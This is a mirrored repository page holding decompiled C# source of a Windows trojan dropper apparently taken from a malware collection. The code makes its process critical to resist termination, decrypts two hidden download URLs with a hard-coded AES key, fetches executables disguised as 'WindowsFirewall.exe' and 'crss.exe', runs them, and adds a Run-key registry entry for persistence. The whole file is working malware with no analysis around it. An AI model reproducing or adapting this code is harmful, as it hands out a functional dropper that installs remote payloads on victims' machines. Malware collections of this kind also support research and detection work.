mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-02 00:15:27 +00:00
63 lines
2.8 KiB
C#
63 lines
2.8 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
|
|||
|
// Assembly: Downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 8B96CE03-B080-4512-8CC1-7DDE95F54AAA
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Net;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Security.Cryptography;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
internal static class vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
|
|||
|
{
|
|||
|
[DllImport("ntdll")]
|
|||
|
private static extern int NtSetInformationProcess(IntPtr p, int c, ref int i, int l);
|
|||
|
|
|||
|
public static void Main()
|
|||
|
{
|
|||
|
int i1 = 1;
|
|||
|
vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i1, 4);
|
|||
|
try
|
|||
|
{
|
|||
|
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\WindowsFirewall.exe";
|
|||
|
new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9DovkArANHKiv+rqzid4MVJn5b"), fileName);
|
|||
|
Process.Start(fileName);
|
|||
|
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\crss.exe";
|
|||
|
new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9Dovl1hmWyr2yTB16aQjN0YI1t"), fileName);
|
|||
|
Process.Start(fileName);
|
|||
|
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
int i2 = 0;
|
|||
|
vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i2, 4);
|
|||
|
}
|
|||
|
|
|||
|
private static string ÍƾYjƔơƻƄT(string ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ)
|
|||
|
{
|
|||
|
RijndaelManaged rijndaelManaged = new RijndaelManaged();
|
|||
|
MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
|
|||
|
byte[] destinationArray = new byte[32];
|
|||
|
byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes("u y"));
|
|||
|
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
|
|||
|
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
|
|||
|
rijndaelManaged.Key = destinationArray;
|
|||
|
rijndaelManaged.Mode = CipherMode.ECB;
|
|||
|
ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
|
|||
|
byte[] inputBuffer = Convert.FromBase64String(ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ);
|
|||
|
return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
|
|||
|
}
|
|||
|
}
|